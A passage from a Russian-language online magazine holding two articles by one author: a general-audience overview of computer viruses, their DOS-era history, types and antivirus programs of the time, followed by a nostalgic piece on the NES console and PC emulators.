Ф. Коэн на конференции по безопасности информации в 1984 году. Однако, еще в работах Винера и фон Неймана исследовались различные виды конечных автоматов, в том числе и самовоспроизводящихся. Что же такое в научном ведении компьютерный вирус?
Вирус — это фрагмент программы, разработанный и написанный с целью неблагоприятного воздействия на Ваш компьютер посредством изменения способа его работы без Вашего ведома или разрешения. Выражаясь техническим языком, вирус — это сегмент программного кода, имплантирующий себя в один из Ваших исполняемых файлов и систематически распространяемый из одного файла в другой. Компьютерные вирусы не образуются сами. Они должны быть написаны и имеют определенную цель. Обычно вирус выполняет две разные функции:
— Распространяет себя из одного файла в другой без Вашего подтверждения или ведома. На техническом языке это называется саморепликацией или размножением.
— Внедряет симптом или нарушение, запланированное злоумышленником. Он может портить диск, искажать программы или просто навести беспорядок в компьютере. На техническом языке это называется полезной нагрузкой вируса, которая может быть доброкачественной или злокачественной по прихоти создателя вируса. Доброкачественный вирус — тот, который не нацелен на причинение компьютеру реального ущерба. Например, вирус, скрывающийся до определенной даты или времени, а затем только выводит некоторое сообщение, считается доброкачественным.
Злокачественный вирус пытается причинить вред компьютеру, в том числе и непреднамеренный. Существует большое число вирусов, причиняющих
ущерб из-за некачественного программирования и явных ошибок в коде самого вируса. Злокачественный вирус — способен изменить одну или более программ, так что они перестают работать надлежащим образом. Зараженная программа может внезапно прекращать работу, записывать неверную информацию в документы. Или вирус может менять информацию о каталогах в системной области диска. Это мешает монтированию
разделов или запуску одной или более программ; а бывает, что программы не могут найти нужные документы. Хотя некоторые вирусы считаются доброкачественными; большая их
часть — это злокачественные вирусы. Некоторые самые опасные из них портят весь жесткий диск или удаляют файлы.
Немного истории.
Мнений по поводу даты рождения первого компьютерного вируса очень много. Мне доподлинно известно только одно: на машине Чарльза Бэббиджа его не было, а на Univac 1108 и IBM-360/370 они уже были (Pervading Animal и Christmas Tree). Таким образом, первый вирус появился где-то в самом начале 70-х или даже в конце 60-х годов, хотя так его никто еще не называл. На этом разговор о вымерших ископаемых предлагаю
считать завершенным. Поговорим о новейшей истории: Brain, Vienna, Cascade и далее. Те, кто начал работать на IBM PC в середине 80-х, еще не забыли повальную эпидемию
этих вирусных заболеваний в 1987—1989 гг. Буквы сыпались на экранах, а толпы пользователей неслись к специалистам по ремонту дисплеев (сейчас все наоборот: винчестер скончался от старости, а валят на неизвестный передовой науке вирус). Затем компьютер заиграл чужеземный гимн «Yankee Doodle», но чинить динамики уже никто не бросился, очень быстро разобрались, что это — вирус, да не один, а целый десяток.
Так вирусы начали заражать файлы. Вирус Brain и скачущий по экрану шарик вируса Ping-pong ознаменовали победу вируса и над Boot-сектором. Все это очень не нравилось пользователям IBM PC, и появились противоядия. Следует обратить внимание на то, что истории завоевания вирусами СНГ и Запада различаются между собой. Первым вирусом, стремительно распространившимся на Западе, был загрузочный вирус Brain, и только потом появились файловые вирусы Vienna и Cascade. В СНГ же, наоборот, сначала появились файловые вирусы, а годом позже — загрузочные. Время шло, вирусы плодились. Все они были чем-то похожи друг на друга, лезли в память, цеплялись к файлам и секторам, периодически убивали файлы, дискеты и винчестеры. Одним из «откровений» стал вирус Frodo.4096 — первый из известных файловых вирусов-невидимок. Этот вирус перехватывал INT 21h и при обращении через DOS к зараженным файлам изменял информацию таким образом, что файл появлялся перед пользователем в незараженном виде. Но это была только надстройка вируса над MS-DOS. Прошло некоторое время, вирусы как электронные тараканы полезли внутрь ядра ДОС (Beast.512). Идея невидимости продолжала приносить свои плоды. Летом 1991 года кося компьютеры, как бубонная чума, вирус Dir_II завоевал мир. Но бороться с невидимками довольно просто. Следует лишь очистить RAM и будь спокоен. Больше хлопот доставляли само шифрующиеся вирусы, которые иногда встречались в очередных поступлениях в коллекции. Ведь для их идентификации и удаления приходилось писать специальные подпрограммы, отлаживать их. Но на это никто не обращал внимания. Пока не появились вирусы нового поколения, которые носят название полиморфик вирусов. Эти вирусы используют другой подход к невидимости: они шифруются (в большинстве случаев), а в расшифровщике используют команды, которые могут не повторяться при заражении различных файлов. Первый полиморфик вирус появился в начале 90-х годов. Это был Chameleon. Но по-настоящему серьезной проблема стала лишь год спустя — в апреле 1991 года, когда практически весь мир был охвачен эпидемией компьютерного вируса Tequila. Эта эпидемия практически не затронула Россию, а первая российская эпидемия, вызванная полиморфик вирусом, нагрянула три года спустя – 1994 год (Phantom 1). Популярность идеи самошифрующихся вирусов вылилась в появление генераторов полиморфик кода. В начале 1992 года появляется знаменитый вирус Dedicated, базирующийся на первом известном генераторе MtE и открывший серию MtE-вирусов. Представляет он из себя объектный модуль (OBJ-файл), и теперь для того,
чтобы из самого обычного нешифрованного вируса получить полиморфик мутанта, достаточно лишь скомпоновать их объектные модули в OBJ-файл. Автору вируса, если он пожелает создать настоящий вирус, уже не надо корпеть над кодами собственного шифровщика — расшифровщика. При желании он может подключить к своему вирусу
генератор и вызывать его из кодов вируса. К счастью, первый MtE-вирус не попал в
«живую природу» и не вызвал эпидемии, а разработчики антивирусных программ соответственно имели некоторый запас времени для подготовки к отражению новой напасти. Всего год спустя изготовление таких вирусов становится уже ремеслом. В
1993 году произошел их «обвал». Создается впечатление, что одним из основных направлений в трудном деле создания вирусов становится разработка и отладка полиморфик механизма. Конкуренция среди авторов вирусов сводится не к тому, кто из них напишет самый крутой вирус, а чей механизм окажется круче всех. Вот далеко не полный список тех из них, которые можно назвать стопроцентно полиморфными:
(на конец 1993 г.): Bootache, CivilWar (четыре версии), Crusher, Dudley, Fly, Freddy, Ginger, Grog, Haifa, Moctezuma (две версии), MVF, Necros, Nukehard, PcFly (три версии), Predator, Satanbug, Sandra, Shoker, Todor, Tremor, Trigger, Uruguay (восемь версий).
Для обнаружения этих вирусов приходится использовать специальные методы, к
которым можно отнести эмуляцию выполнения кода вируса, математические алгоритмы восстановления участков кода и данных в вирусе. К нестопроцентным полиморфикам (т. е. вирусам, которые шифруют себя, но в дешифраторе вируса всегда существуют постоянные байты) можно отнести еще десяток вирусов: Basilisk, Daemaen,
Invisible (две версии), Mirea (несколько версий), Rasek (три версии), Sarov, Scoundrel, Seat, Silly, Simulation. Однако и они требуют расшифровки кода для их обнаружения и восстановления пораженных объектов, поскольку длина постоянного кода в дешифраторе этих вирусов слишком мала. Распространялись генераторы вирусов по станциям BBS в виде архивов, содержащих объектные модули, документацию и примеры использования. В конце 1993 г. было известно уже семь генераторов полиморфик кода.
Это были: МТЕ 0.90 (Mutation Engine), четыре различные версии ТРЕ (Trident Polymorphic Engine), NED (Nuke Encryption Device), DAME (Dark Angel’s Multiple Encryptor).
С тех пор новые полиморфные генераторы появлялись по нескольку штук в год, и приводить их полный список вряд ли имеет смысл.
Что же сейчас могут вирусы?
Как вы ещё не перепугались? И не побежали галопом проверять свой компьютер на наличие вирусов? Похвально! У Вас железные нервы. Ну, коли так, перейдём к самой напряжённой части этой публикации. А именно описанию возможностей современных вирусов.
Вирусы, заражающие файлы:
Это вирусы, присоединяющиеся к файлам .COM и .EXE (или подменяющие их), хотя в отдельных случаях они могут заражать и файлы с расширениями .SYS, .DRV, .BIN, .OVL и .OVY. Вирусы этого типа обычно делают неинфицированные программы инфицированными, когда они исполняются в памяти. В других случаях программы заражаются, когда они открыты (например, с применением команды DOS DIR), или вирус просто заражает все файлы в каталоге, из которого он запущен (прямая инфекция).
Вирусы загрузочного сектора:
Каждый логический диск, жесткий или гибкий, содержит загрузочный сектор. Это относится даже к несистемным дискам. В загрузочном секторе находится специфическая информация о формате диска, хранящихся на нем данных, а также небольшая программа,
называемая программой загрузки (она загружает системные файлы DOS). Программа загрузки отображает знакомое сообщение «Non-system Disk or Disk Error», если системные файлы DOS отсутствуют. Эту программу и заражают вирусы. Вирус загрузочного сектора можно получить, оставив в дисководе зараженную дискету и загрузив машину. При считывании и выполнении программы загрузочного сектора вирус попадает в память и заражает жесткий диск. Помните, что так как загрузочный сектор есть у каждого диска, машину можно заразить и от диска данных (обычно так и происходит).
ПРИМЕЧАНИЕ: Загрузочный сектор есть как на дискетах, так и на жестком диске.
Вирусы главной загрузочной записи:
Первый физический сектор каждого жесткого диска (сторона Ш, дорожка Ш, сектор 1) содержит главную загрузочную запись (Master Boot Record, MBR) и таблицу разделов. В главной загрузочной записи находится маленькая программа, называемая главной загрузочной программой, которая определяет положение загрузочного раздела по таблице разделов и командует системе идти туда и выполнять любой содержащийся там код. Предположим, что диск отформатирован правильно, и загрузочный сектор находится в позиции (сторона Ш, дорожка Ш, сектор 1). На флоппи-дисках те же самые вирусы заражают загрузочный сектор. Вирус главной загрузочной записи распространяется точно так же, как и вирус загрузочного сектора — когда зараженная дискета оставлена в дисководе во время перезагрузки машины. При считывании и исполнении программы
загрузочного сектора вирус попадает в память и заражает MBR жесткого диска. Опять же, так как загрузочный сектор имеется на каждом диске, машину можно заразить и от диска данных.
Многораздельные вирусы:
Многораздельные вирусы представляют собой сочетание перечисленных выше вирусов. Они заражают как файлы, так и записи MBR или загрузочные секторы. Вирусы этого типа встречаются редко, но их число постоянно растет.
Чего вирусы не делают:
Компьютерные вирусы не заражают файлы на защищенных от записи дисках и не заражают документов, за исключением случая макровирусов Word, которые заражают только документы и шаблоны Word 6.0 или выше. Не заражаются и копрессированные файлы. Вирусы не действуют на аппаратуру компьютера — мониторы, микросхемы и
т.п.; они заражают только программы. Кроме того, вирусы Macintosh не заражают компьютерные программы для DOS и наоборот. Например, знаменитый вирус Michelangelo не заражает приложения для Macintosh. Опять же, исключение из этого
правила составляют макровирусы Word и Excel, которые поражают электронные таблицы, документы и шаблоны, которые могут открывать компьютеры Windows или Macintosh. Наконец, вирусы не обязательно как-то проявляют себя – даже после того как что-то испортилось.
Как распространяются вирусы:
Вирусы распространяются при запуске зараженного приложения или загрузке компьютера с диска, системные файлы которого заражены. Например, если программа текстового процессора заражена вирусом, он активизируется при работе этой программы.
Когда вирус находится в памяти, он обычно заражает любую программу, с которой Вы работаете, включая сетевые приложения (если у Вас есть право записи на сетевые диски или в папки). Вирусы ведут себя по-разному. Некоторые остаются активными в памяти до выключения компьютера. Другие — только до тех пор, пока работает зараженная программа. Выключение компьютера или выход из приложения удаляет вирус из памяти, но не из зараженного файла или с диска. Если вирус находится в системном файле, он активизируется при следующей загрузке системы с зараженного диска. Если вирус
находится в приложении, он снова активизируется при следующем запуске этого приложения.
Доктора вызывали?
Заканчивая тему нельзя не коснуться самого главного, а именно защиты от напасти под названием компьютерный вирус. Для этого существуют антивирусные пакеты. К сожалению, многие из них платные, а другие нет. В любом случае я приведу обзор этих программ, а Вам уже решать, что использовать у себя дома, а что в офисе с разветвлённой локальной сетью.
Платные антивирусы:
AVP www.avp.ru

«Лаборатория Касперского» предлагает широкий спектр антивирусного программного обеспечения, как для индивидуальных пользователей, так и для корпоративных сетей под
названием AntiViral Toolkit Pro.
«…Мы предлагаем все типы антивирусной защиты: антивирусные сканеры, мониторы и ревизоры контроля несанкционированного изменения на диске…». АВП поддерживает все наиболее популярные операционные системы, почтовые системы, межсетевые экраны (firewall). А так же обеспечивает полный контроль, за всеми возможными каналами проникновения компьютерных вирусов. Мощные локальные и сетевые средства автоматизации и централизованного контроля над антивирусной защитой «Лаборатории Касперского» обеспечивают пользователям максимальное удобство и скорость при построении собственной системы защиты против компьютерных вирусов.
Антивирусные продукты «Лаборатории Касперского» имеют сертификаты российских и международных государственных организаций и независимых тестовых лабораторий.
Продукты Symantec Corpotation:

http://www.symantec.com Symantec AntiVirus™ – полнофункциональное антивирусное решение, обеспечивающее многоуровневую защиту корпоративного класса для шлюзов Интернета и почтовых шлюзов, серверов и рабочих станций. Благодаря сочетанию получившей признание пользователей антивирусной технологии и глобальной инфраструктуры поддержки корпорации Symantec эти программы обеспечивают надежную защиту. Использованные в этих пакетах эффективные технологии и поддержка защиты сети на всех уровнях устраняют необходимость в создании системы обеспечения безопасности из разрозненных продуктов, выпущенных различными поставщиками.
Центральная консоль управления Symantec System Center™ позволяет системным администраторам развертывать антивирусные решения, а затем создавать, принудительно проводить и обновлять политики, обеспечивающие правильную постоянную настройку серверов и рабочих станций, в масштабе всего предприятия и на различных платформах.
Продукты пакета, предназначенные для работы в шлюзах, обеспечивают быстродействующую масштабируемую защиту, предотвращающую проникновение вирусов в защищаемую сеть. Развитые средства автоматизации уменьшают объем администрирования, обеспечивают организациям улучшенную защиту и сокращают время
отклика. Технология Digital Immune System™, примененная в пакетах Symantec AntiVirus,
позволяет автоматически выполнять поиск, обнаружение и изоляцию новых вирусов, обеспечивая быстродействующую, надежную и не требующую вмешательства оператора защиту. Кроме того, уникальная многоуровневая технология NAVEX™, разработанная корпорацией Symantec, обеспечивает обновление описаний вирусов и модулей расширения без повторного развертывания программ и перезагрузки системы, благодаря чему увеличивается время бесперебойной работы системы и сокращается совокупная стоимость владения. Для повышения быстродействия и улучшения безопасности в новой
версии уменьшен объем файлов описаний вирусов, а также включена возможность многопоточного серверного развертывания. Пакеты Symantec AntiVirus™, как и
другие продукты корпорации Symantec, предназначенные для обеспечения безопасности,
поддерживается службой Symantec™ Security Response, ведущей организацией, занимающейся исследованиями и предоставлением технической помощи в области обеспечения безопасности при работе с Интернетом.
Семейство McAfee Security:

http://www.mccafee.com Семейство McAfee Security — предназначено для комплексной антивирусной защиты любого уровня: от карманного и персонального компьютера до распределенной корпоративной сети. Пользователи антивирусных продуктов McAfee – более 70 миллионов человек по всему миру. Кроме того, антивирусная защита McAfee является корпоративным стандартом для 80% компаний, входящих в «Fortune 100» (100 ведущих мировых компаний). Продукты McAfee Security обеспечивают полную защиту для всех распространенных операционных систем и приложений, обнаруживая и корректно удаляя более 60 тысяч вирусов и враждебных программ. Помимо традиционной антивирусной защиты McAfee Security предлагает первое на рынке средство превентивной
защиты от вирусов — ThreatScan, а также брандмауэр и систему обнаружения вторжений
на уровне рабочих станций – McAfee Desktop Firewall. Полная защита от вирусов
Антивирусы McAfee обеспечивают высочайший уровень защиты, неоднократно подтвержденный сертификатами ICSA, Checkmark Level 2, VirusBulletin 100%
Detection и многочисленными независимыми тестами. Обнаруживаются и удаляются все типы вирусов и троянских программ, враждебные объекты Java/ActiveX, блокируется доступ к опасным WEB-ресурсам. Обнаружение более 60000 вирусов Антивирусный механизм Olympus, разработанный на базе передовых технологий McAfee и Dr. Solomon обнаруживает более 60 000 вирусов и враждебных программ, обеспечивая самый высокий на рынке показатель восстановления поврежденных файлов. Полномасштабная защита всех ОС McAfee Security охватывает все операционные системы и групповые приложения, используемые в современных корпоративных сетях: клиентские ОС Windows 95 / 98 / ME / NT Workstation / 2000 Professional / XP Home & Professional, DOS, Macintosh.
Cерверные ОС Windows NT Server, Windows 2000 Server / Advanced Server / Datacenter, Novell Netware 4.11 / 4.2 / 5.0 / 5.1 / 6.0, FreeBSD, Linux, HP-UX, AIX, SCO, Solaris. Групповые приложения MS Exchange 5.5/2000 и Lotus Notes/Domino. Интернет — шлюзы Windows NT/2000 и Sun Solaris; сетевые устройства хранения данных NetApp; ОС микрокомпьютеров (PDA) Palm OS, Windows CE / Pocket PC, EPOC (Psion). Превентивная защита сети от вирусов. Не имеющий аналогов на рынке продукт ThreatScan позволяет применять профилактические меры для защиты сети от потерь, связанных с вирусными эпидемиями, посредством регулярных проверок сети на предмет уязвимостей без необходимости привлечения экспертов по безопасности. ThreatScan обнаруживает незащищенные, неуправляемые, зараженные или уязвимые машины сети. Использование ThreatScan позволяет перейти от схемы реагирования на возникшие вирусные эпидемии к схеме предотвращения эпидемий, что избавляет от соответствующих затрат на устранение последствий деятельности вирусов.
Бесплатные антивирусы:
AVTrojan и Anti-VBS http://www.trojan.ru
Эти две простые программы написаны Игорем Суменковым. AVTrojan представляет собой программу, призванную бороться с таким подвидом вредоносных программ, как «троянские кони». Для тех, кто не знает, могу сообщить: это программы, которые рекламируется как нечто полезное, но на самом деле не выполняют такого предназначения или, помимо полезных действий, совершают противозаконные действия в руках злоумышленников. Окно, появляющееся при запуске Anti-VBS, сразу раскрывает все возможности программы. Программа AVTrojan весьма проста, но эффективна. Она позволяет проверить: память, реестр, папки или отдельные файлы как вместе, так и по отдельности. Все функции доступны из панели инструментов продукта или, как обычно, через меню. Настройки программы минимальны, и самыми полезными из них, на мой взгляд, являются запуск одновременно с Windows и непонятно как попавшее сюда охлаждение процессора. Стоит отметить, что в отличие от обычных антивирусов AVTrojan является специализированным средством, созданным только для уничтожения «троянских» программ, поэтому и методы немного отличаются от обычных. Если пользователь запросил удаление «троянской» программы, обычный антивирус пытается удалить соответствующий ей файл на диске. Однако если данная «троянская» программа уже запущена, то ликвидировать такой файл нельзя, потому что он занят Windows. Результат — сообщение «Невозможно удалить вирус», и начинающий пользователь ничего не сможет сделать. AVTrojan же удаляет любую обнаруженную «троянскую» программу в любом состоянии. Если она уже запущена, то принудительно закрываются все процессы в памяти, соответствующие данной программе, и после этого файл корректно удаляется.
Вторая программа, Anti-VBS, имеет весьма узкую специализацию и предназначена для поиска и уничтожения вируса I love you, а также всех его модификаций. В принципе возможно обнаружение и других VBS (Visual Basic Script) вирусов. Никаких настроек и премудростей у программы нет. Галочка «Лечить зараженные файлы» и кнопки «Старт» и «Выход».
InoculateIT Personal Edition http://antivirus.cai.com
Эта программа компании Computer Associates International представляет собой мощный антивирусный комплекс, способный защитить компьютер от любых типов вирусов. Для получения программы надо зарегистрироваться на сайте разработчика. Данный антивирус работает под управлением Windows. Защита осуществляется в реальном времени, необходимый программный модуль загружается одновременно с Windows. Кроме того, вы всегда можете проверить жесткие и гибкие диски на предмет вирусов и других вредоносных программ. Антивирус построен наподобие Проводника, так что вы без проблем можете проверить как отдельные файлы, так и вызывающие у вас подозрения папки. Программа ведет подробную статистику, которая записывается в файл прямо с самого начала работы, отображая все данные в нижнем окне. Кроме того, InoculateIT способен проверять содержимое основных типов архивных файлов, что ставит его в один
ряд с самими современными антивирусами. Программа предусматривает создание шаблонов для проверки по всем дискам, возможность их сохранения и даже создания специальной дискеты для этого. Также данный антивирус защищается паролем, что будет полезно системным администраторам. Опции InoculateIT, касающиеся операций с макровирусами. InoculateIT поддерживает автоматическое обновление баз по вирусам и
поставляется вместе с энциклопедией этих вредных программ, где довольно подробно описаны их основные виды и особенности. Также неплохой Help. Содержит словарь основных терминов, но, как я уже говорил, все на английском языке, так что пользователям, плохо его знающим, от наличия этого словаря легче не станет. Работает программа весьма шустро и в целом оставляет после себя хорошее впечатление.
The Nicks Ghost Buster http://members.tripod.com/~NGBuster
Данная программа российского производства является ревизором диска, работающим в среде Windows 9х и NT. По функциональным возможностям Ghost Buster является конкурентом популярной программы ADinf. Но отличается от последней тем, что работает под управлением Windows. Со всеми вытекающими отсюда последствиями. Такими, как: графический интерфейс (GUI), многозадачная работа, многопоточность, истинная 32-разрядность. Самый главный плюс, по словам автора, в том что, можно обращаться напрямую к дискам (практически любым, не только физическим) через драйвер IOS (Супервизор ввода-вывода или драйвер 32-бит доступа к диску) в обход DOS-резидентов (в частности, Boot-вирусов, перехвативших 13h прерывание при загрузке компьютера), что не под силу DOS-программам. Понятно, что справедливо это только при работе в Windows9x. Основное окно программы The Nicks Ghost Buster заставляет вас вспомнить всем знакомый сериал о четверке охотников за привидениями. The Nicks Ghost Buster запоминает и при каждом запуске проверяет информацию об операционной системе и установленном аппаратном обеспечении — объем оперативной памяти DOS (изменения которой бывают при заражении большинством загрузочных вирусов), количество установленных винчестеров, таблицы параметров винчестера (Hard Disk Parameter Table). При всех этих проверках программа просматривает диск по секторам, обращаясь непосредственно в IOS, и не использует прерывания Int 21h и Int 13h, что
позволяет успешно обнаруживать активные маскирующиеся вирусы (Stealth-вирусы).
Действует программа следующим образом: при первом запуске она запоминает объем оперативной памяти DOS, адрес обработчика INT 13h, таблицы параметров диска и создает таблицы для проверяемых дисков. Потом антивирус проверяет диски в следующей последовательности: Проверяется объем оперативной памяти, доступной DOS, и таблица параметров жесткого диска (HDPT). Проверяются Master-Boot и Boot-секторы. Если найдены их изменения, то сравниваются текущие системные таблицы с теми, которые были ранее, и по желанию можно восстановить прежний сектор. Сектор
Master-Boot анализируется при проверке всех логических дисков. Проверяется список номеров сбойных кластеров, так как некоторые вирусы помечают хороший кластер как сбойный и используют этот кластер для размещения в нем своего кода и данных.
Проверяется дерево каталогов диска. Ищутся новые и удаленные каталоги. Проверяются файлы. Ищутся новые, удаленные, переименованные, перемещенные из одного каталога в другой и измененные файлы. Проверяется изменение длины даты и времени создания
файла и контрольной суммы файла. В завершение изменения анализируются, и если они, по мнению антивируса, «безобидны», т. е. не похожи на проявления вируса, то программа просто представит вам всю информацию об изменениях. Если же происходят «подозрительные» изменения (похожие на проявления вируса), то NGB предупредит вас о возможности заражения. Интерфейс программы весьма прост и нагляден. Есть у The Nicks Ghost Buster одно неудобство — нельзя проверить определенный каталог на диске. Диск всегда проверяется только целиком, по разделам. Вообще же продукт производит приятное впечатление, и его можно смело рекомендовать если не к ежедневному применению, то по крайней мере к знакомству.
В завершении хочу сказать лишь одно, самый сильный антивирус это ваше благоразумие!!!

При создании статьи была использована информация с сайтов: http://www.submarine.ru http://www.avp.ru http://www.symantec.com , а так же других разработчиков программ представленных выше. В публикации был использован фрагмент книги Юлия Кима “Всё о вирусах”.

Роман Карпач

Восьмибитное чудо.

Было время, когда все компьютерные игры были добрыми и весёлыми. В них не было того насилия, которое присуще их современным братьям. Но это не мешало нам засиживаться перед телевизором с любимой приставкой допоздна, проходя бесконечные лабиринты Принца Персии, спасая мир от злобных мутантов в Контре да и просто весело проводить свой досуг. Теперь никто из нас будет покупать приставку, чтобы поиграть в Марио. Да и зачем? Оказывается, что любимые приставочные игры можно запускать и на вашем PC! В этом нам как всегда поможет Интернет.
1.История Nintendo
Nindendo, Lifa, Dendy, Ufa, Сюбор – у неё было множество названий. Приставки, которая покорила весь мир. Игровой платформы ставшей самой популярной за всю историю развития развлекательной компьютерной индустрии. В разных странах ей давали разные имена. Nintendo (так ее звали в штатах), Famicom (это имя ей присвоили японцы), Dendy (слоненок, название и фирменный логотип придумала фирма, распространявшая приставку на территории СНГ), в конце концов, просто NES. Восьмибитка, как ласково в народе называли приставку, являлась самой популярной консолью. Хотя на рынке уже в начале 90-х появились шестнадцатибитные Sega. Ведь, по большому счету, именно с этой платформы началась история видеоигр. Приставка появилась в Японии в 1982 году, после чего была представлена всему миру в 1984 году. Но для начала следует обрисовать картину рынка видеоигр тех времен. С момента появления первого аркадного автомата прошло уже практически пять лет. К тому времени игровые залы стали обыденностью, а автоматы с играми Defender и Galaxian, Guruin и Bubble можно было найти в любой забегаловке, в любом кинотеатре.


buble2

Такого понятия, как игровая приставка, тогда еще не существовало. И никто даже представить себе не мог, что когда-то появятся домашние игровые машины. Фирма Nintendo of Japan к тому времени уже имела некоторый опыт производства видеоигр. На разработку приставки ушло около года. И вот Pasofami (японское название NES) явилась на суд игровой общественности. Покупатели, мягко говоря, несколько опешили. А потом начался настоящий бум на продукцию Nintendo. Приставки расходились по всему миру гигантскими партиями. Разработчики со всего света подписывали контракты на производство игр под их приставку. А пользователи были на седьмом небе от счастья, сидели у телевизоров как приклеенные, играя во все подряд, боготворя героя Марио и ведя бои с ордами вражеских танков в Battle City.

bc

И ведь было за что хвалить — такого успеха на видеорынке еще никто не добивался. Грамотная рекламная политика, забота о пользователе и большой объем выпущенных игр сделали свое дело — NES побила все рекорды по продажам и на данный момент, даже на фоне новых 64-битных платформ, все еще является рекордсменом по количеству проданных экземпляров. А ведь вы, наверное, и не знаете, что Nintendo представляет собой внутри? Приставка снабжена процессором с тактовой частотой около 1.8MHz. Ее выход пришелся на время резкого скачка популярности персональных компьютеров, поэтому приставки переживали серьезный кризис. Тем не менее, простота в обращении и новый дизайн сделали свое дело, и эта платформа буквально в течение года стала самой популярной в мире. Этому, в частности, способствовала игровая поддержка, большой ассортимент игр и регулярно выходящие новинки. Приставка поддерживала разрешение 256 х 224, что было эталоном для 8-битных приставок, и палитру из 52 цветов, из которых 26 одновременно выводились на экран, все это поддерживалось 5-канальным звуком. Официально для платформы вышло более 3000 игр. Хотя на Западе приставка уже не продаётся с начала 90-х. Наши братья из дружественного Китая продолжают их продавать у нас в стране.
2. Компьютер и Nintendo
Время пролетело незаметно. И в один прекрасный день, увидев свою любимую приставку на рынке. Я подумал. Ведь есть же эмуляторы старых компьютеров таких как: Спектрум, Атари, Корвет?! Почему же не может быть их и для нашей любимой приставки? Придя, домой гложимый воспоминаниями я зашёл в Интернет. После продолжительных поисков мне открылись несколько сайтов на которых находились огромные коллекции некогда всеми любимых игр. По адресу http://emulators.wallst.ru/nintendomul.htm имеется внушительная коллекция эмуляторов DENDY. Программы сами по себе небольшие. Для вас я бы порекомендовал эмулятор под названием NESTICLE. Хотя он и работает в среде DOS, но его функциональность и возможности могут только радовать. С помощью этой программы мы можем записывать музыку с любимых игр, менять разрешения экрана, делать скриншоты высокого качества. Самым же главным достоинством NESTICLE является то, что он не искажает звук. Ну, ведь эмулятор это только пол дела. Следует так же скачать восьмибитные игры. Все они хранятся в файлах с расширением *.NES. На сайте www.apm.boom.ru вы найдёте всё, во что вы когда-то играли. Например, любимого МАРИО.

2mario

Единственное что может вызвать головную боль, так это не желание запускаться некоторых игр. Поэтому скачайте несколько разных эмуляторов. Ведь бывает так, что игра не работает с NESTICLE, но работает с JNES. ftp.cs.albany.edu/pub/kesecki/nestcle — этот ftp архив тоже должен порадовать вас своей большой коллекцией. В общей сложности мне удалось найти 94 игры. И теперь с чувством глубокого душевного удовлетворения я могу сказать, что любимая восьмибитка живёт не только в наших сердцах, но и на жёстких дисках наших компьютеров!

Роман Карпач

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41